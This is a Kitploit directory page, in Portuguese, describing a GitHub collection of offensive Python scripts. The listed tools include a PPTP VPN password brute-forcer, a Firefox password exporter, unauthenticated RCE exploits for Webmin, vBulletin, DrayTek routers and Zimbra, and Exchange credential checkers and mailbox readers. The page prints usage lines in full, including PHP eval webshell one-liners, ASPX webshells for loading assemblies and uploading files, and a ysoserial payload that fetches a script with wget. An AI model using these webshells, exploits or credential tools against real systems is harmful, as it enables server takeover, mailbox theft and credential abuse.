Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Homework-of-Python — Códigos Python do meu blog. | Kitploit
Ferramentas/GitHubGitHub/3gstudent/homework-of-python
Scanners de VulnerabilidadesAtaques de SenhaExploraçãoExploração de Aplicações WebColeta de InformaçõesPós-ExploraçãoRed TeamingDesenvolvimento de Payloads
GitHub3gstudent/homework-of-python

Homework-of-Python

Códigos Python do meu blog.

Ver Repositório
4121264há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Homework-of-Python

Códigos Python do meu blog.

pptp_password_hack.py

Use um ataque de força bruta para obter a senha da VPN PPTP.

Ele lê as senhas do arquivo (chamado wordlist) e depois usa pptpsetup para conectar ao servidor.

O intervalo de tempo é de 10 segundos.


portscan.py

Usado para escanear portas.

O tempo limite (timeout) é de 3 segundos.

Versão em C++:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

Usado para obter o IP a partir da URL.

Posso usar o resultado do Sublist3r diretamente.

file_deduplication(For_urltoip).py

Usado para remover IPs duplicados do resultado do Sublist3r.

Posso usar o resultado do urltoip.py diretamente.

Os IPs podem ser ordenados usando o Sublime (F9).


file_deduplication.py

Usado para remover itens duplicados de arquivo.

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

Baixar ferramenta

Referência:

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

Usado para chamar a API do fofa e imprimir o IP dos resultados.

Você pode obter 100 resultados.

fofa_api_VIP.py

Usado para chamar a API do fofa e imprimir o IP dos resultados.

Se você for VIP, obterá 10000 resultados.


vBulletin_5.x_0day_pre-auth_RCE.py

Referência:

https://seclists.org/fulldisclosure/2019/Sep/31

Ex.:

root@kitploit:~
echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

Referência:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

Ex.:

root@kitploit:~
system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

Usado para exportar a senha do Firefox

get_Exchange_version.py

Usado para obter a versão do Exchange.

Primeiro, obtenha o BuildNumber através do código-fonte da URL e depois obtenha a versão.

Referência:

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

Usado para escanear a vulnerabilidade RCE do SMBv3.

O tempo limite (timeout) é de 3 segundos.


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

Referência:

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

Os dispositivos DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta e Vigor300B 1.3.3_Beta, 1.4.2.1_Beta e 1.4.4_Beta permitem execução remota de código como root (sem autenticação) através de metacaracteres de shell no URI cgi-bin/mainfunction.cgi..

Produtos afetados:

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

Use a API SOAP do Zimbra para conectar ao servidor de e-mail Zimbra.

Uso:

root@kitploit:~
      Zimbra_SOAP_API.py <url> <username> <password> <mode>

modo:

  • low auth para token baixo
  • admin auth para token de administrador
  • ssrf Use CVE-2019-9621 para obter o token de administrador

Ex.:

root@kitploit:~
      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

Usado para verificar a conta válida do Exchange Web Service (suporta plaintext e ntlmhash)

Referência: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

Uso:

root@kitploit:~
checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

Ex.:

root@kitploit:~
checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

Usado para acessar o Autodiscover.xml e obter a configuração do usuário (suporta plaintext e ntlmhash)

Uso:

root@kitploit:~
checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

Ex.:

root@kitploit:~
checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

checkAutodiscoverEx.py

Modo extra do checkAutodiscover.py

Adiciona um parâmetro

ewsManage.py

Usado para acessar o Exchange Web Service (suporta plaintext e ntlmhash)

Uso:

root@kitploit:~
ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


Ex.:

root@kitploit:~
ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

Usado para verificar a credencial válida do SSH (suporta senha e arquivo de chave privada)

Uso:

root@kitploit:~
sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

Ex.:

root@kitploit:~
sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd

Execução remota de comandos via SSH (suporta senha e arquivo de chave privada)

Uso:

root@kitploit:~
sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

Ex.:

root@kitploit:~
sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

Usado para verificar a credencial válida do eas (Exchange Server ActiveSync)

Uso:

root@kitploit:~
easCheck.py <host> <user> <password>

Ex.:

root@kitploit:~
easCheck.py 192.168.1.1 user1 password1

checkOWA.py

Usado para verificar a conta válida do Exchange conectando-se ao OWA.

Uso:

root@kitploit:~
checkOWA.py <url> <user> <password>

owaManage.py

Usado para ler e-mails conectando-se ao OWA.

Uso:

root@kitploit:~
owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

Use IMAP para conectar ao servidor de e-mail.

Uso:

root@kitploit:~
imapManage.py <IMAP server> <username> <password> <command>    
<command>:
CheckConfig             get the folder name
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

Usado para implementar a autenticação NTLM e comunicar-se com execCmd.aspx

Os dados de comunicação são codificados com Base64

Uso:

root@kitploit:~
aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

Versão em C#: SharpExchangeBackdoor.cs

Usado para enviar payload para o backdoor de webshell do Exchange.

Suporte:

  • assemblyLoad
  • webshellWrite

Uso:

root@kitploit:~
    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

Ex.:

root@kitploit:~
    SharpExchangeBackdoor.py https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.py https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx:

root@kitploit:~
<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>

webshellWrite.aspx:

root@kitploit:~
<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>

Zimbra_deserialization_RCE(CVE-2019-6980).py

Desserialização insegura de objetos - IMAP

Uso:

root@kitploit:~
<url> <user> <password> <payload path>

Ex.:

root@kitploit:~
https://192.168.1.1 [email protected] password1 payload.obj

Nota:

Você pode gerar o payload.obj assim:

java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget https://192.168.1.1/test.sh --no-check-certificate -O /tmp/test.sh" > payload.obj


ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py

ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py

ExchangeDeserializeShell-NoAuth-ghostfile.py

Usado para testar a execução de código por desserialização do Exchange.
Das permissões de leitura e escrita dos arquivos do Exchange até a execução de código por desserialização. Você deve modificar o machineKey em %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config para implementar a execução de código por desserialização. <path>: owa ou ecp

Uso:

root@kitploit:~
    <url> <key> <path>

Ex.:

root@kitploit:~
 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
 mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp    

Exchange_EWS_XML_Parser.py

Usado para analisar mensagens SOAP XML do Exchange.


eacManage.py

Usado para acessar o centro de administração do Exchange

Uso:

root@kitploit:~
eacManage.py <url> <user> <password> <command>
<command>:
- ListAdminRoles
- NewAdminRoles
- EditAdminRoles
- DeleteAdminRoles
- AddMailbox
- RemoveMailbox
- ExportAllMailbox          
- GetCertificate 
- ExportCertificate          
          

vSphereAutomationAPI_Manage.py

Use a API vSphere Automation (v7.0U1+) para gerenciar a VM

Suporta VMs Windows e Linux

vSphereWebServicesAPI_Manage.py

Use a API vSphere Web Services para gerenciar a VM

Referência: https://github.com/vmware/pyvmomi/

Instalação: pip install --upgrade pyvmomi

vCenterLDAP_Manage.py

Usado para gerenciar o banco de dados LDAP no vCenter.


SolarWindsOrion_Manage.py

Usado para gerenciar a plataforma SolarWinds Orion

SolarWindsOrionAPI_Manage.py

Use a API SolarWinds Orion para gerenciar a plataforma Orion


MailEnableManage.py

Usado para gerenciar o servidor de e-mail MailEnable


blind_XXEPlatform_CVE-2019-9670.py

Suporta o recebimento de resultados através dos protocolos HTTP ou FTP.


ewsManage_Downloader.py

Usado para acessar o Exchange Web Service (suporta plaintext e ntlmhash)

ewsManage_exchangelib_Downloader.py

Usado para acessar o Exchange Web Service (suporta plaintext e ntlmhash)

ewsManage_requests_ntlm_Downloader.py

Use requests_ntlm2 para acessar o Exchange Web Service (suporta plaintext e ntlmhash)

ewsManage_requests_ntlm_Session_Downloader.py

Use requests_ntlm2 para acessar o Exchange Web Service (suporta plaintext e ntlmhash)

Use sessão para reduzir os dados de comunicação


vCenter_ExtraCertFromMdb.py

Modificado a partir de https://github.com/horizon3ai/vcenter_saml_login

vCenter_GenerateLoginCookie.py

Modificado a partir de https://github.com/horizon3ai/vcenter_saml_login


Exchange_GetVersion_MatchVul.py

Usado para obter a versão do Exchange e combinar as vulnerabilidades existentes

Exchange_GetVersion_ParseFromFile.py

Usado para obter a versão do Exchange e analisar a versão a partir de https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019

Você deve salvar https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 como exchange.data

Exchange_GetVersion_ParseFromWebsite.py

Usado para obter a versão do Exchange e analisar a versão a partir de https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019


Exchange_GetInternalIP.py

Usado para obter o IP interno do Exchange

Baseado em msf auxiliary/scanner/http/owa_iis_internal_ip, mas suporta mais servidores Exchange.


vRealizeOperationsManager_GetVersion.py

Usado para obter a versão do vRealize Operations Manager


BIG-IP_RunBash.py

Use bash para executar comandos


SophosUTM_plxDecrypter.py

Usado para descriptografar o arquivo .plx do Sophos UTM

Referência:

https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

https://github.com/the6p4c/bfs_extract

SophosUTM_ConfigParser.py

Usado para analisar a configuração do Sophos UTM